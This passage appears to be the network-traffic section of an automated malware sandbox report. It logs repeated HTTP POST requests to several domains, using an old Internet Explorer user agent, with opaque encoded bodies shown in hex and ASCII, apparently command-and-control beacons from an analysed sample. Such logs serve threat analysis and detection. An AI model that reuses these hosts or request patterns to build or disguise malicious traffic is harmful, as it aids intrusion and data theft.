61 77 73 54 56 70 74 52 61 2b 67 46 67 47 34 32 57 34 32 70 61 67 6c 4e 31 4d 53 69 39 4e 30 79 6b 74 73 76 79 64 54 75 47 75 4c 33 6d 57 66 38 39 6e 57 65 4a 37 55 64 46 65 6e 65 5a 41 76 50 4c 78 66 63 75 38 7a 4c 77 49 48 7a 6e 67 79 71 53 33 58 46 4b 70 38 51 69 57 4e 58 63 37 4a 56 65 33 44 37 32 42 31 67 77 74 2b 46 30 33 66 2f 37 48 2f 4d 39 77 37 6e 41 67 56 35 4d 32 7a 64 61 39 51 6b 6e 61 44 64 61 63 37 57 4c 78 39 37 7a 6e 2f 48 56 4e 35 53 43 43 34 55 2f 6b 6f 75 4e 77 64 79 34 31 59 35 66 47 5a 67 49 39 76 30 34 50 6c 6b 63 79 56 6c 41 68 63 38 2f 43 65 36 41 54 41 53 4a 77 75 4a 47 33 30 46 79 79 49 77 79 36 50 45 43 76 4c 68 2f 36 31 31 38 36 4b 56 6b 4a 59 44 33 46 30 77 44 30 77 51 67 70 53 37 7a 56 50 38 79 64 36 6a 4b 30 3d Data Ascii: VTaP0rlQIAoPouA0SMJNglLtH9uXRIR1/V6OOAcZ5tboOBRIyTaW/yb2rrEFkxquqU/og5Sil3uGi+1GXr2f3CyHAstjg2dRv+s1HbotQtVzxzP3R4gTjqVX6WtbxlVhbGUFZ0LP/T7/GGoSp24HJhrJ1IcPdGTLaeKilV7BJcsoZcEPWELiZ4CnHKpm0EgDgZyS+8SjJdAJEdyvg6e4WTo3c7NK/uMEFzTnmxxUXevpOOluGQ8jWgf725gTImvm5v4KhqVUjUhwC/SMYoNvK6pbgJ/nVFNEYw4W2XAAE7Lfzt2rgQqfV1M0VgHtT5FzGawsTVptRa+gFgG42W42paglN1MSi9N0yktsvydTuGuL3mWf89nWeJ7UdFeneZAvPLxfcu8zLwIHzngyqS3XFKp8QiWNXc7JVe3D72B1gwt+F03f/7H/M9w7nAgV5M2zda9QknaDdac7WLx97zn/HVN5SCC4U/kouNwdy41Y5fGZgI9v04PlkcyVlAhc8/Ce6ATASJwuJG30FyyIwy6PECvLh/61186KVkJYD3F0wD0wQgpS7zVP8yd6jK0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 42 6a 42 37 67 53 30 4f 44 51 70 6b 4e 54 4e 71 4a 4a 6b 6a 56 65 61 79 33 72 38 62 6b 63 6a 37 73 56 46 74 62 4c 39 42 58 63 4f 46 39 55 72 6c 56 6e 77 37 71 43 38 46 46 6d 71 48 31 41 51 56 61 55 6e 76 7a 62 39 52 54 4c 64 6c 52 6e 70 54 33 72 73 47 74 72 57 76 75 73 74 79 50 34 78 55 57 4d 68 50 4c 74 63 6d 6e 4e 30 43 71 6c 2f 32 6a 71 46 4f 37 4e 75 56 6e 56 67 36 69 4a 5a 57 76 6f 4c 45 36 6a 34 6c 49 41 65 75 47 49 49 31 79 7a 4b 70 6b 4c 38 72 48 39 45 31 63 52 72 4d 4a 58 4f 56 33 55 43 69 4f 74 31 34 72 37 37 66 44 65 4a 79 39 79 32 45 44 37 31 34 4b 2f 47 70 54 6a 76 64 32 64 51 70 36 57 73 4f 47 2b 49 4f 62 6c 61 71 61 4a 72 42 77 78 74 6a 78 51 53 49 74 30 48 70 68 72 31 68 5a 56 5a 36 6d 79 38 50 38 51 39 6a 53 66 34 46 4f 57 79 4a 4b 50 67 6d 69 63 34 37 70 43 42 4a 32 5a 48 6a 49 59 42 79 76 39 67 32 66 77 6a 36 59 75 47 6c 71 64 59 34 37 58 32 54 37 78 66 58 62 61 6e 67 4e 77 79 2b 7a 45 39 6d 38 65 53 43 76 65 49 6b 63 57 44 59 61 31 33 38 44 52 39 62 47 44 5a 6b 62 43 71 58 49 48 55 6b 64 45 2f 6d 69 74 68 44 45 55 32 54 6c 33 41 47 4f 6d 4a 72 6e 71 39 4f 48 33 30 6c 6c 34 67 61 69 63 5a 4c 69 76 69 57 2b 61 7a 31 33 69 6f 62 62 32 33 63 6d 55 64 56 41 57 32 33 55 35 35 72 66 4b 67 67 58 2f 65 4b 36 50 61 58 74 48 5a 6d 39 61 55 47 73 5a 74 4a 79 35 7a 62 4e 72 49 52 55 52 32 49 45 6e 79 41 33 2b 4a 69 61 41 75 59 35 50 42 69 7a 4d 6c 7a 58 50 35 48 67 69 65 4b 63 39 35 32 4b 59 64 37 6f 76 6f 61 4d 2f 72 4d 42 53 61 34 77 47 57 2f 76 39 57 75 77 32 35 35 65 54 52 36 59 6c 77 46 6d 6f 5a 34 39 53 48 79 32 2b 77 33 6a 79 6d 78 46 77 44 39 49 70 51 73 4f 57 42 36 6c 31 50 44 77 30 47 53 49 53 53 7a 6d 4c 57 41 67 6f 68 6b 37 68 34 4c 30 30 47 76 5a 39 73 33 59 64 72 7a 6a 66 32 6e 39 58 2b 32 64 75 73 3d Data Ascii: BjB7gS0ODQpkNTNqJJkjVeay3r8bkcj7sVFtbL9BXcOF9UrlVnw7qC8FFmqH1AQVaUnvzb9RTLdlRnpT3rsGtrWvustyP4xUWMhPLtcmnN0Cql/2jqFO7NuVnVg6iJZWvoLE6j4lIAeuGII1yzKpkL8rH9E1cRrMJXOV3UCiOt14r77fDeJy9y2ED714K/GpTjvd2dQp6WsOG+IOblaqaJrBwxtjxQSIt0Hphr1hZVZ6my8P8Q9jSf4FOWyJKPgmic47pCBJ2ZHjIYByv9g2fwj6YuGlqdY47X2T7xfXbangNwy+zE9m8eSCveIkcWDYa138DR9bGDZkbCqXIHUkdE/mithDEU2Tl3AGOmJrnq9OH30ll4gaicZLiviW+az13iobb23cmUdVAW23U55rfKggX/eK6PaXtHZm9aUGsZtJy5zbNrIRUR2IEnyA3+JiaAuY5PBizMlzXP5HgieKc952KYd7ovoaM/rMBSa4wGW/v9Wuw255eTR6YlwFmoZ49SHy2+w3jymxFwD9IpQsOWB6l1PDw0GSISSzmLWAgohk7h4L00GvZ9s3Ydrzjf2n9X+2dus=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.synetik.netCache-Control: no-cacheData Raw: 6d 2b 73 74 2b 55 4d 79 4d 67 70 30 6c 76 37 61 53 6a 4b 4e 71 57 78 70 4b 78 44 70 76 52 58 5a 4a 2b 52 74 32 66 44 53 63 75 56 6e 76 53 73 6f 2b 30 55 62 38 68 76 34 4d 56 37 6f 65 2b 4f 6c 51 30 31 39 61 50 79 32 4a 39 48 4b 37 78 77 36 31 41 42 2b 57 45 51 31 56 6d 42 2f 44 57 55 4b 72 56 67 7a 68 4b 39 73 32 35 2b 33 6c 54 36 46 5a 34 4e 69 35 41 47 38 4b 6b 46 61 70 66 54 30 72 47 68 6d 63 72 2f 42 38 56 43 67 55 58 6f 62 37 36 66 46 48 31 58 56 4f 46 69 41 70 65 77 76 44 34 58 70 32 36 6b 51 65 39 38 67 75 67 38 56 6a 39 41 69 62 58 72 4e 62 44 75 43 33 48 41 61 6b 41 76 62 70 6a 75 76 4d 33 43 57 39 76 6e 45 76 58 53 4b 6a 51 48 44 4f 4d 63 58 6e 68 31 31 52 38 6e 76 42 41 42 2f 71 74 5a 50 6c 67 48 61 4d 64 67 43 78 64 6b 43 4a 50 42 51 2b 33 58 38 67 4d 73 6c 55 4e 65 47 51 36 75 73 79 53 71 2b 63 30 79 4f 75 66 34 31 56 6e 6f 57 55 6f 46 57 79 64 49 51 42 65 74 74 35 69 2b 72 7a 72 41 31 45 68 57 35 69 6c 45 63 48 74 33 53 4b 46 57 35 76 31 41 71 6e 34 36 6f 37 73 63 67 78 46 48 2f 34 4d 59 32 6a 4e 6b 6c 50 72 51 6c 76 4d 4b 2f 44 36 6d 73 71 75 34 48 2f 77 34 32 68 55 6f 74 63 45 6b 45 71 75 44 41 75 64 6e 76 2f 49 65 63 62 69 76 59 64 31 4d 67 36 49 54 6d 67 45 4a 56 2b 4d 65 53 6f 65 78 57 75 2f 68 37 53 67 56 54 53 4b 55 33 72 4b 34 6e 47 70 6d 71 4b 6c 4e 78 4f 39 30 36 57 73 79 72 4b 53 4c 4b 50 31 6f 46 71 34 50 32 52 55 64 53 43 73 4b 44 4f 79 4d 49 50 6f 45 41 4b 31 4c 46 6b 61 46 6d 35 61 51 65 54 79 6f 34 68 2b 6e 71 6b 32 6a 4e 45 69 54 4e 70 6e 46 43 53 65 31 4e 44 74 67 42 4d 4a 37 59 45 4a 69 6b 62 6d 4b 36 77 47 53 6b 34 74 4c 51 43 36 75 55 4e 79 34 69 30 6e 62 66 4a 30 4a 34 69 43 6d 67 49 36 75 65 31 4f 79 69 6b 4a 76 49 63 57 61 69 41 41 3d 3d Data Ascii: m+st+UMyMgp0lv7aSjKNqWxpKxDpvRXZJ+Rt2fDScuVnvSso+0Ub8hv4MV7oe+OlQ019aPy2J9HK7xw61AB+WEQ1VmB/DWUKrVgzhK9s25+3lT6FZ4Ni5AG8KkFapfT0rGhmcr/B8VCgUXob76fFH1XVOFiApewvD4Xp26kQe98gug8Vj9AibXrNbDuC3HAakAvbpjuvM3CW9vnEvXSKjQHDOMcXnh11R8nvBAB/qtZPlgHaMdgCxdkCJPBQ+3X8gMslUNeGQ6usySq+c0yOuf41VnoWUoFWydIQBett5i+rzrA1EhW5ilEcHt3SKFW5v1Aqn46o7scgxFH/4MY2jNklPrQlvMK/D6msqu4H/w42hUotcEkEquDAudnv/IecbivYd1Mg6ITmgEJV+MeSoexWu/h7SgVTSKU3rK4nGpmqKlNxO906WsyrKSLKP1oFq4P2RUdSCsKDOyMIPoEAK1LFkaFm5aQeTyo4h+nqk2jNEiTNpnFCSe1NDtgBMJ7YEJikbmK6wGSk4tLQC6uUNy4i0nbfJ0J4iCmgI6ue1OyikJvIcWaiAA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 56 54 61 50 30 72 6c 51 49 41 6f 50 6f 75 41 30 53 4d 4a 4e 67 6c 4c 74 48 39 75 58 52 49 52 31 2f 56 36 4f 4f 41 63 5a 35 74 62 6f 4f 42 52 49 79 54 61 57 2f 79 62 32 72 72 45 46 6b 78 71 75 71 55 2f 6f 67 35 53 69 6c 33 75 47 69 2b 31 47 58 72 32 66 33 43 79 48 41 73 74 6a 67 32 64 52 76 2b 73 31 48 62 6f 74 51 74 56 7a 78 7a 50 33 52 34 67 54 6a 71 56 58 36 57 74 62 78 6c 56 68 62 47 55 46 5a 30 4c 50 2f 54 37 2f 47 47 6f 53 70 32 34 48 4a 68 72 4a 31 49 63 50 64 47 54 4c 61 65 4b 69 6c 56 37 42 4a 63 73 6f 5a 63 45 50 57 45 4c 69 5a 34 43 6e 48 4b 70 6d 30 45 67 44 67 5a 79 53 2b 38 53 6a 4a 64 41 4a 45 64 79 76 67 36 65 34 57 54 6f 33 63 37 4e 4b 2f 75 4d 45 46 7a 54 6e 6d 78 78 55 58 65 76 70 4f 4f 6c 75 47 51 38 6a 57 67 66 37 32 35 67 54 49 6d 76 6d 35 76 34 4b 68 71 56 55 6a 55 68 77 43 2f 53 4d 59 6f 4e 76 4b 36 70 62 67 4a 2f 6e 56 46 4e 45 59 77 34 57 32 58 41 41 45 37 4c 66 7a 74 32 72 67 51 71 66 56 31 4d 30 56 67 48 74 54 35 46 7a 47 61 77 73 54 56 70 74 52 61 2b 67 46 67 47 34 32 57 34 32 70 61 67 6c 4e 31 4d 53 69 39 4e 30 79 6b 74 73 76 79 64 54 75 47 75 4c 33 6d 57 66 38 39 6e 57 65 4a 37 55 64 46 65 6e 65 5a 41 76 50 4c 78 66 63 75 38 7a 4c 77 49 48 7a 6e 67 79 71 53 33 58 46 4b 70 38 51 69 57 4e 58 63 37 4a 56 65 33 44 37 32 42 31 67 77 74 2b 46 30 33 66 2f 37 48 2f 4d 39 77 37 6e 41 67 56 35 4d 32 7a 64 61 39 51 6b 6e 61 44 64 61 63 37 57 4c 78 39 37 7a 6e 2f 48 56 4e 35 53 43 43 34 55 2f 6b 6f 75 4e 77 64 79 34 31 59 35 66 47 5a 67 49 39 76 30 34 50 6c 6b 63 79 56 6c 41 68 63 38 2f 43 65 36 41 54 41 53 4a 77 75 4a 47 33 30 46 79 79 49 77 79 36 50 45 43 76 4c 68 2f 36 31 31 38 36 4b 56 6b 4a 59 44 33 46 30 77 44 30 77 51 67 70 53 37 7a 56 50 38 79 64 36 6a 4b 30 3d Data Ascii: VTaP0rlQIAoPouA0SMJNglLtH9uXRIR1/V6OOAcZ5tboOBRIyTaW/yb2rrEFkxquqU/og5Sil3uGi+1GXr2f3CyHAstjg2dRv+s1HbotQtVzxzP3R4gTjqVX6WtbxlVhbGUFZ0LP/T7/GGoSp24HJhrJ1IcPdGTLaeKilV7BJcsoZcEPWELiZ4CnHKpm0EgDgZyS+8SjJdAJEdyvg6e4WTo3c7NK/uMEFzTnmxxUXevpOOluGQ8jWgf725gTImvm5v4KhqVUjUhwC/SMYoNvK6pbgJ/nVFNEYw4W2XAAE7Lfzt2rgQqfV1M0VgHtT5FzGawsTVptRa+gFgG42W42paglN1MSi9N0yktsvydTuGuL3mWf89nWeJ7UdFeneZAvPLxfcu8zLwIHzngyqS3XFKp8QiWNXc7JVe3D72B1gwt+F03f/7H/M9w7nAgV5M2zda9QknaDdac7WLx97zn/HVN5SCC4U/kouNwdy41Y5fGZgI9v04PlkcyVlAhc8/Ce6ATASJwuJG30FyyIwy6PECvLh/61186KVkJYD3F0wD0wQgpS7zVP8yd6jK0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 5a 4d 32 33 77 6c 51 77 6c 41 72 51 59 6d 4c 70 4c 39 39 71 69 61 64 43 34 71 4c 4d 4e 2b 54 33 79 4e 6f 34 4c 42 72 6b 41 52 36 5a 4c 66 37 38 36 78 73 49 61 70 65 33 66 4a 65 64 47 6e 58 32 78 30 56 6c 30 77 32 79 39 51 58 6a 6f 75 38 4c 61 47 5a 4d 54 63 47 75 5a 2b 74 74 78 6c 73 75 7a 56 42 65 53 48 67 44 69 75 45 68 75 7a 36 54 6f 30 6a 6f 73 32 55 6d 77 43 58 45 78 4f 75 35 59 33 51 48 67 36 47 55 74 32 4d 77 4b 48 54 35 2f 78 46 43 58 2b 76 48 35 58 66 77 72 2b 48 63 7a 35 54 62 73 38 54 35 4e 47 38 70 49 61 30 69 6d 6b 75 55 78 55 78 42 6e 64 5a 4f 36 31 72 36 48 63 7a 6e 70 50 63 37 4d 6b 7a 4d 57 59 43 55 46 5a 4f 42 32 44 69 36 39 35 4c 4c 53 6a 6f 74 32 55 57 4a 51 72 42 73 5a 58 79 6f 52 39 73 75 35 58 74 53 4d 66 53 4c 74 78 76 42 68 4c 64 31 48 6c 73 48 32 70 44 4f 49 75 44 51 50 38 4c 46 71 76 6d 41 6b 64 48 75 77 4f 39 49 55 6e 6a 2b 78 78 61 70 74 37 4d 58 5a 74 4c 43 56 2f 7a 76 48 75 6f 48 58 79 43 63 75 5a 53 71 38 4e 61 6c 4a 48 31 59 30 45 4b 5a 61 46 4c 44 37 31 65 4a 6d 50 74 6d 7a 38 33 73 4b 50 42 6f 48 31 59 33 77 30 75 65 6a 2f 72 4c 45 4b 4f 71 30 68 55 31 71 35 62 68 77 6f 4d 6c 74 43 4c 6e 6d 39 6e 54 59 43 39 43 62 6b 62 45 46 37 54 35 54 62 39 54 38 72 44 52 7a 4a 57 33 52 72 77 6e 4e 74 66 4a 66 6b 69 42 31 64 2b 57 6a 68 79 77 57 55 5a 2b 6f 74 55 45 73 79 42 54 4c 32 69 5a 68 7a 74 6b 72 6c 76 64 49 7a 59 59 7a 7a 42 76 44 33 48 72 35 51 45 66 7a 37 69 2b 79 73 58 48 72 58 44 5a 30 33 38 71 59 76 72 4c 53 73 49 54 70 38 5a 4a 76 69 44 61 6e 73 4f 43 53 73 6a 39 4f 61 56 57 76 4b 6c 72 67 4a 4a 57 70 50 69 30 59 35 51 6b 51 62 79 4f 43 63 4a 50 78 32 30 55 2f 36 48 47 65 66 74 38 36 66 6e 2b 4e 5a 74 61 68 34 69 33 43 6e 4e 77 39 37 4e 7a 5a 47 6f 36 44 2b 53 4a 56 35 42 33 4c 42 4a 6c 43 38 64 65 Data Ascii: ZM23wlQwlArQYmLpL99qiadC4qLMN+T3yNo4LBrkAR6ZLf786xsIape3fJedGnX2x0Vl0w2y9QXjou8LaGZMTcGuZ+ttxlsuzVBeSHgDiuEhuz6To0jos2UmwCXExOu5Y3QHg6GUt2MwKHT5/xFCX+vH5Xfwr+Hcz5Tbs8T5NG8pIa0imkuUxUxBndZO61r6HcznpPc7MkzMWYCUFZOB2Di695LLSjot2UWJQrBsZXyoR9su5XtSMfSLtxvBhLd1HlsH2pDOIuDQP8LFqvmAkdHuwO9IUnj+xxapt7MXZtLCV/zvHuoHXyCcuZSq8NalJH1Y0EKZaFLD71eJmPtmz83sKPBoH1Y3w0uej/rLEKOq0hU1q5bhwoMltCLnm9nTYC9CbkbEF7T5Tb9T8rDRzJW3RrwnNtfJfkiB1d+WjhywWUZ+otUEsyBTL2iZhztkrlvdIzYYzzBvD3Hr5QEfz7i+ysXHrXDZ038qYvrLSsITp8ZJviDansOCSsj9OaVWvKlrgJJWpPi0Y5QkQbyOCcJPx20U/6HGeft86fn+NZtah4i3CnNw97NzZGo6D+SJV5B3LBJlC8de
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 5a 4d 32 33 77 6c 51 77 6c 41 72 51 59 6d 4c 70 4c 39 39 71 69 61 64 43 34 71 4c 4d 4e 2b 54 33 79 4e 6f 34 4c 42 72 6b 41 52 36 5a 4c 66 37 38 36 78 73 49 61 70 65 33 66 4a 65 64 47 6e 58 32 78 30 56 6c 30 77 32 79 39 51 58 6a 6f 75 38 4c 61 47 5a 4d 54 63 47 75 5a 2b 74 74 78 6c 73 75 7a 56 42 65 53 48 67 44 69 75 45 68 75 7a 36 54 6f 30 6a 6f 73 32 55 6d 77 43 58 45 78 4f 75 35 59 33 51 48 67 36 47 55 74 32 4d 77 4b 48 54 35 2f 78 46 43 58 2b 76 48 35 58 66 77 72 2b 48 63 7a 35 54 62 73 38 54 35 4e 47 38 70 49 61 30 69 6d 6b 75 55 78 55 78 42 6e 64 5a 4f 36 31 72 36 48 63 7a 6e 70 50 63 37 4d 6b 7a 4d 57 59 43 55 46 5a 4f 42 32 44 69 36 39 35 4c 4c 53 6a 6f 74 32 55 57 4a 51 72 42 73 5a 58 79 6f 52 39 73 75 35 58 74 53 4d 66 53 4c 74 78 76 42 68 4c 64 31 48 6c 73 48 32 70 44 4f 49 75 44 51 50 38 4c 46 71 76 6d 41 6b 64 48 75 77 4f 39 49 55 6e 6a 2b 78 78 61 70 74 37 4d 58 5a 74 4c 43 56 2f 7a 76 48 75 6f 48 58 79 43 63 75 5a 53 71 38 4e 61 6c 4a 48 31 59 30 45 4b 5a 61 46 4c 44 37 31 65 4a 6d 50 74 6d 7a 38 33 73 4b 50 42 6f 48 31 59 33 77 30 75 65 6a 2f 72 4c 45 4b 4f 71 30 68 55 31 71 35 62 68 77 6f 4d 6c 74 43 4c 6e 6d 39 6e 54 59 43 39 43 62 6b 62 45 46 37 54 35 54 62 39 54 38 72 44 52 7a 4a 57 33 52 72 77 6e 4e 74 66 4a 66 6b 69 42 31 64 2b 57 6a 68 79 77 57 55 5a 2b 6f 74 55 45 73 79 42 54 4c 32 69 5a 68 7a 74 6b 72 6c 76 64 49 7a 59 59 7a 7a 42 76 44 33 48 72 35 51 45 66 7a 37 69 2b 79 73 58 48 72 58 44 5a 30 33 38 71 59 76 72 4c 53 73 49 54 70 38 5a 4a 76 69 44 61 6e 73 4f 43 53 73 6a 39 4f 61 56 57 76 4b 6c 72 67 4a 4a 57 70 50 69 30 59 35 51 6b 51 62 79 4f 43 63 4a 50 78 32 30 55 2f 36 48 47 65 66 74 38 36 66 6e 2b 4e 5a 74 61 68 34 69 33 43 6e 4e 77 39 37 4e 7a 5a 47 6f 36 44 2b 53 4a 56 35 42 33 4c 42 4a 6c 43 38 64 65 Data Ascii: ZM23wlQwlArQYmLpL99qiadC4qLMN+T3yNo4LBrkAR6ZLf786xsIape3fJedGnX2x0Vl0w2y9QXjou8LaGZMTcGuZ+ttxlsuzVBeSHgDiuEhuz6To0jos2UmwCXExOu5Y3QHg6GUt2MwKHT5/xFCX+vH5Xfwr+Hcz5Tbs8T5NG8pIa0imkuUxUxBndZO61r6HcznpPc7MkzMWYCUFZOB2Di695LLSjot2UWJQrBsZXyoR9su5XtSMfSLtxvBhLd1HlsH2pDOIuDQP8LFqvmAkdHuwO9IUnj+xxapt7MXZtLCV/zvHuoHXyCcuZSq8NalJH1Y0EKZaFLD71eJmPtmz83sKPBoH1Y3w0uej/rLEKOq0hU1q5bhwoMltCLnm9nTYC9CbkbEF7T5Tb9T8rDRzJW3RrwnNtfJfkiB1d+WjhywWUZ+otUEsyBTL2iZhztkrlvdIzYYzzBvD3Hr5QEfz7i+ysXHrXDZ038qYvrLSsITp8ZJviDansOCSsj9OaVWvKlrgJJWpPi0Y5QkQbyOCcJPx20U/6HGeft86fn+NZtah4i3CnNw97NzZGo6D+SJV5B3LBJlC8de
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 6a 49 4a 61 68 77 48 55 75 77 71 57 4b 4d 42 48 34 42 32 4b 55 74 70 37 74 31 52 2f 44 62 43 4b 78 65 6f 69 65 62 49 43 46 72 6f 43 69 70 44 32 30 68 2f 38 64 58 61 38 49 6f 4f 61 50 45 47 2f 38 37 48 64 6e 68 70 63 4f 4a 57 41 2b 67 6d 75 62 2f 4b 72 32 31 30 2f 67 2b 6e 6b 63 38 7a 65 4e 63 35 50 6c 56 77 45 6d 64 46 46 6c 42 36 59 68 4c 65 48 57 35 6b 53 73 78 64 68 46 70 79 4d 59 47 34 61 52 57 69 68 68 4e 65 47 68 44 61 67 2b 56 61 39 70 4d 38 62 74 72 69 70 6b 37 79 78 6f 56 30 72 6c 79 64 2b 75 69 30 2b 58 47 6d 4d 79 62 78 5a 78 78 2f 4e 56 4d 67 58 68 6f 69 74 57 50 37 79 70 73 65 30 4e 48 31 6a 56 51 39 72 61 57 59 46 30 32 6c 4e 72 36 35 6f 71 49 4d 61 34 55 68 36 6a 69 33 67 31 54 57 4b 32 63 74 5a 77 67 33 67 35 32 44 58 6d 75 56 65 45 49 4b 30 66 6e 54 66 64 66 71 61 68 38 75 41 5a 65 36 39 76 32 61 4a 5a 59 68 59 6f 62 38 78 79 54 42 75 58 62 37 4d 33 52 34 6c 39 55 37 31 62 4e 72 47 57 41 62 66 4f 7a 62 65 69 6e 36 65 77 76 53 62 38 74 35 38 49 48 44 44 50 6a 6e 32 64 6c 61 75 42 46 68 44 33 32 53 43 4b 49 44 48 6c 36 64 6d 59 75 32 72 59 34 4d 45 43 53 71 67 41 30 46 51 4f 6d 57 34 53 2f 72 36 39 6b 6a 38 58 32 4b 45 54 54 6d 45 71 6e 6e 5a 2b 62 63 79 54 73 61 35 48 61 74 51 59 55 2b 6a 77 7a 6f 6d 72 6c 67 2b 53 46 37 57 34 54 5a 66 38 41 7a 54 4d 64 4f 6d 56 7a 37 77 67 4b 4b 58 6a 5a 50 6a 6f 55 57 42 79 6f 4b 4f 2f 47 71 53 7a 52 34 58 31 78 68 2f 30 6c 7a 74 77 5a 37 61 37 77 2f 7a 30 41 42 4e 70 4b 6d 30 53 44 63 42 49 73 49 30 71 64 49 71 6d 44 43 71 47 6e 59 49 2b 45 5a 50 35 37 56 4b 31 48 51 47 45 6a 30 57 36 75 63 48 46 57 52 57 31 31 72 4a 54 54 7a 47 6e 69 37 56 65 6c 2b 58 4f 6c 76 46 59 72 68 31 5a 6a 75 75 46 51 4f 45 Data Ascii: jIJahwHUuwqWKMBH4B2KUtp7t1R/DbCKxeoiebICFroCipD20h/8dXa8IoOaPEG/87HdnhpcOJWA+gmub/Kr210/g+nkc8zeNc5PlVwEmdFFlB6YhLeHW5kSsxdhFpyMYG4aRWihhNeGhDag+Va9pM8btripk7yxoV0rlyd+ui0+XGmMybxZxx/NVMgXhoitWP7ypse0NH1jVQ9raWYF02lNr65oqIMa4Uh6ji3g1TWK2ctZwg3g52DXmuVeEIK0fnTfdfqah8uAZe69v2aJZYhYob8xyTBuXb7M3R4l9U71bNrGWAbfOzbein6ewvSb8t58IHDDPjn2dlauBFhD32SCKIDHl6dmYu2rY4MECSqgA0FQOmW4S/r69kj8X2KETTmEqnnZ+bcyTsa5HatQYU+jwzomrlg+SF7W4TZf8AzTMdOmVz7wgKKXjZPjoUWByoKO/GqSzR4X1xh/0lztwZ7a7w/z0ABNpKm0SDcBIsI0qdIqmDCqGnYI+EZP57VK1HQGEj0W6ucHFWRW11rJTTzGni7Vel+XOlvFYrh1ZjuuFQOE
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 67 63 67 6f 42 32 36 6d 4d 67 71 7a 37 7a 6c 31 65 54 6f 50 4d 4e 47 4e 6e 34 44 75 53 43 5a 6a 67 6e 33 55 72 61 62 2b 66 71 4e 67 4b 37 39 31 5a 6e 52 31 71 67 31 79 79 4c 78 43 74 63 76 77 42 58 78 6b 45 57 35 66 76 73 6f 64 53 32 6e 33 58 58 2f 52 56 6a 75 48 32 36 74 2f 68 7a 70 44 50 41 52 33 4a 44 57 70 5a 6f 37 59 2f 69 39 6c 33 59 4b 52 43 6d 54 38 77 36 77 6f 4a 4d 66 61 58 74 59 38 6b 4d 41 67 4d 6e 59 4d 68 55 53 4c 51 2b 31 31 61 55 49 4f 58 62 41 48 63 34 6d 6e 6d 4d 50 51 36 4e 69 4e 6a 74 61 67 62 30 41 75 39 70 70 59 71 75 41 2f 36 4c 38 54 51 5a 38 30 36 73 45 62 42 34 59 35 54 78 42 50 75 58 59 4d 4b 7a 42 45 38 78 51 44 53 58 46 49 73 38 58 65 41 45 41 36 39 46 78 70 2b 4c 70 57 30 52 69 55 4b 43 52 6a 42 6f 2f 45 39 63 71 55 4e 35 76 44 70 70 66 4b 56 35 6a 76 6c 45 34 36 58 44 6b 4e 6a 48 57 47 41 4c 68 34 4e 4d 6d 63 67 5a 71 78 75 64 74 6f 6f 36 47 62 79 67 79 36 34 6a 5a 58 31 44 31 53 67 55 73 53 64 37 73 2f 61 57 74 42 67 32 58 6e 44 41 36 53 33 45 52 7a 72 2f 42 2b 6c 76 2b 70 6d 38 43 4c 70 6a 43 33 31 49 79 5a 74 4d 63 68 6a 67 65 69 54 56 77 6e 39 79 46 32 30 44 56 49 38 62 58 61 6b 58 67 32 34 66 4a 62 41 4c 38 50 68 51 2f 4a 36 48 72 4b 38 41 54 48 51 59 72 6e 32 63 48 6d 2f 53 69 69 34 58 49 55 53 51 45 62 34 64 61 4d 74 6f 72 45 6e 78 39 6f 58 70 37 41 4d 76 4d 37 68 6b 57 47 30 6e 62 6e 63 6e 6b 79 6a 34 48 2b 67 6b 4b 38 75 65 5a 33 30 6d 41 54 63 4f 45 52 34 64 66 4b 74 68 54 49 52 57 6d 59 4c 69 57 6f 47 55 41 33 63 75 67 69 74 31 73 6f 7a 6d 39 77 79 37 69 67 77 37 50 62 45 73 42 58 35 4d 61 4a 2b 32 68 54 39 6a 59 54 52 58 43 54 55 4a 6f 55 Data Ascii: gcgoB26mMgqz7zl1eToPMNGNn4DuSCZjgn3Urab+fqNgK791ZnR1qg1yyLxCtcvwBXxkEW5fvsodS2n3XX/RVjuH26t/hzpDPAR3JDWpZo7Y/i9l3YKRCmT8w6woJMfaXtY8kMAgMnYMhUSLQ+11aUIOXbAHc4mnmMPQ6NiNjtagb0Au9ppYquA/6L8TQZ806sEbB4Y5TxBPuXYMKzBE8xQDSXFIs8XeAEA69Fxp+LpW0RiUKCRjBo/E9cqUN5vDppfKV5jvlE46XDkNjHWGALh4NMmcgZqxudtoo6Gbygy64jZX1D1SgUsSd7s/aWtBg2XnDA6S3ERzr/B+lv+pm8CLpjC31IyZtMchjgeiTVwn9yF20DVI8bXakXg24fJbAL8PhQ/J6HrK8ATHQYrn2cHm/Sii4XIUSQEb4daMtorEnx9oXp7AMvM7hkWG0nbncnkyj4H+gkK8ueZ30mATcOER4dfKthTIRWmYLiWoGUA3cugit1sozm9wy7igw7PbEsBX5MaJ+2hT9jYTRXCTUJoU
